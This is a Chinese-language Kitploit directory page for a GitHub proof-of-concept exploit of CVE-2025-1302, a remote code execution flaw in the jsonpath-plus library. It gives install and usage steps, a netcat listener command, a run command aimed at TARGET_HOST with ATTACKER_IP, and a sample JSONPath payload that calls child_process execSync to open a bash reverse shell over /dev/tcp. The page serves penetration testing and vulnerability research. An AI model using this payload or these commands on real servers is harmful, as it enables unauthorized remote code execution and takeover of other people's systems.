Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — 针对 jsonpath-plus 中 CVE-2025-1302 的 PoC 漏洞利用和易受攻击的服务器演示。 | Kitploit
工具/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

针对 jsonpath-plus 中 CVE-2025-1302 的 PoC 漏洞利用和易受攻击的服务器演示。

查看仓库
111年前尚未审核
分享

CVE-2025-1302 JSONPath-Plus RCE PoC

PoC脚本名称: poc.py

这是一个针对CVE-2025-1302的概念验证漏洞利用脚本,该漏洞影响jsonpath-plus库中的RCE漏洞。当对存在漏洞的服务端点运行时,该脚本尝试通过JSONPath负载触发远程代码执行,并建立反向Shell连接到攻击者。


功能特性

  • 灵活的HTTP方法:通过 --method 或 --no-fallback 标志支持 POST、GET 或 AUTO(POST 并回退到 GET)。
  • 自定义负载:从文件中加载一个或多个 JSONPath RCE 负载模板,支持 {ip} 和 {port} 模板占位符。
  • 内置默认负载:如果没有提供负载文件,则使用完整的 bash 反向 Shell 模板。
  • 详细调试信息:POST 和 GET 尝试失败时打印完整的请求/响应主体。
  • 进度指示:使用 tqdm 进度条显示延迟和负载循环。
  • 日志记录:可通过 --output 将所有结果保存为JSON文件。

安装

  1. 克隆此仓库:

    root@kitploit:~
    git clone https://github.com/yourorg/jsonpath-rce-poc.git
    cd jsonpath-rce-poc
    
  2. 安装依赖(需要 Python 3.6+):

    root@kitploit:~
    pip install -r requirements.txt
    

使用方法

  1. 在攻击者机器上启动监听器(根据需要替换端口):

    root@kitploit:~
    nc -lvnp 9999
    
  2. 运行 PoC:

    root@kitploit:~
    python3 poc.py \
      --url http://TARGET_HOST:PORT/query \
      --ip ATTACKER_IP --port 9999 \
      [--payload-file payloads.txt] \
      [--delay 5] \
      [--method AUTO|POST|GET] \
      [--no-fallback] \
      [--output results.json]
    
  • --payload-file:包含每行一个 JSONPath 负载的文件。使用 {ip} 和 {port} 占位符。
  • --delay:发送负载前的等待秒数(显示倒计时)。
  • --method:强制使用 POST、GET 或 AUTO(默认)。
  • --no-fallback:跳过任何 GET 重试的简写(等同于 --method POST)。
  • --output:保存尝试的 JSON 日志文件路径。

示例负载文件

root@kitploit:~
$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]

贡献

  1. Fork 本仓库并创建功能分支。
  2. 提交包含你更改的拉取请求。

免责声明

请仅在受控的实验室环境中,针对你拥有或明确授权测试的系统使用此脚本。滥用可能违法且不道德。

下载工具